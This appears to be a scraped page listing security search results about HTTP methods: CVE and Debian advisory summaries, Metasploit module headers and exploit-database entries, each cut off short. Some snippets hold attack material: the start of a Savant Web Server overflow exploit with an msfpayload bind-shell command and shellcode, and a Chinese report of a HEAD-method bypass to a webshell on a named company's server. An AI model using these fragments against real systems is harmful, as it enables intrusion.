HTTPie - a CLI, cURL-like tool for humans

HTTPie pronounced aych-tee-tee-pie is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output...

HTTP 'PUT' Method Detection

Binary data 8699.prm...

HTTP 'DELETE' Method Detection

Binary data 8700.prm...

CVE-2015-0628

The proxy engine on Cisco Web Security Appliance WSA devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

Design/Logic Flaw

The proxy engine on Cisco Web Security Appliance WSA devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

CVE-2015-0628

The proxy engine on Cisco Web Security Appliance WSA devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

CVE-2015-0628

The CVE-2015-0628 issue affects Cisco Web Security Appliance (WSA) where the proxy engine fails to properly handle malformed HTTP methods, enabling remote attackers to bypass proxying restrictions. This is a vulnerability in the proxy component that could permit unauthorized proxy traffic if an a...

Jenkins-CI Login Utility

This module attempts to login to a Jenkins-CI instance using a specific user/pass. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

Debian DSA-3031-1 : apt - security update

The Google Security Team discovered a buffer overflow vulnerability in the HTTP transport code in apt-get. An attacker able to man-in-the-middle a HTTP request to an apt repository can trigger the buffer overflow, leading to a crash of the 'http' apt method binary, or potentially to arbitrary cod...

[SECURITY] [DSA 3031-1] apt security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3031-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso September 23, 2014 http://www.debian.org/security/faq -...

用友某没修复好可以绕过继续拿shell（HTTP Method防护绕过技巧）

简要描述： 刚上wooyun，发现有个提醒，用友一个JBOSS漏洞对我公开了。 然后就稍微看了下，还是可以继续搞进去嘛。 详细说明： 原始漏洞是这个： http://wooyun.org/bugs/wooyun-2014-065444 用/invoker/EJBInvokerServlet已经拿不到shell了，/jmx-console/也加了验证， 但是可以用HEAD方法绕过唉亲。 然后就是修改成HEAD数据包继续搞shell. 漏洞证明： 一句话shell地址：http://xiaoxi.yonyou.com/tshThSIjBouKg/XbAXCDkfoW.jsp...

Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)

No description provided by source. !/usr/bin/python import socket targetaddress=10.10.10.129 targetport=80 buffer2 = R0cX + R0cX msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += \xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1...

Apache Struts includeParams Remote Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

Ezhometech Ezserver 6.4 Stack Overflow Exploit

No description provided by source. Exploit Title: Ezhometech EzServer =6.4 Stack Overflow Vulnerability Author: modpr0be Contact: researchatSpenteradotcom Platform: Windows Tested on: Windows XP SP3 OptIn, Windows 2003 SP2 OptIn Software Link: http://www.ezhometech.com/buyezserver.htm References:...

RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', 'Description' = %q This module exploits a path traversal...

Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection

This module exploits a SQL injection vulnerability in the "explorer" action of "miqpolicy" controller of the Red Hat CloudForms Management Engine 5.1 ManageIQ Enterprise Virtualization Manager 5.0 and earlier by changing the password of the target account to the specified password. This module...

Apache Struts - includeParams Remote Code Execution (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Apache Struts includeParams Remote Co...

LinkedIn Cross Site Request Forgery

============================================= INTERNET SECURITY AUDITORS ALERT 2013-001 - Original release date: January 30th, 2013 - Last revised: March 25th, 2013 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 CVSSv2 Base Score ============================================= I...

Configuring Veeam Backup Cloud Edition with HP Cloud

Challenge Specifying a container in HP Cloud account settings results in the following error: Incorrect HTTP method used in the request 26301 Fault Name: IncorrectHTTPMethod Error Type: MethodValidationFailure Description: Incorrect HTTP method used in the request Service: publiccsservices...

Ruby on Rails JSON Processor YAML Deserialization Scanner

This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ruby...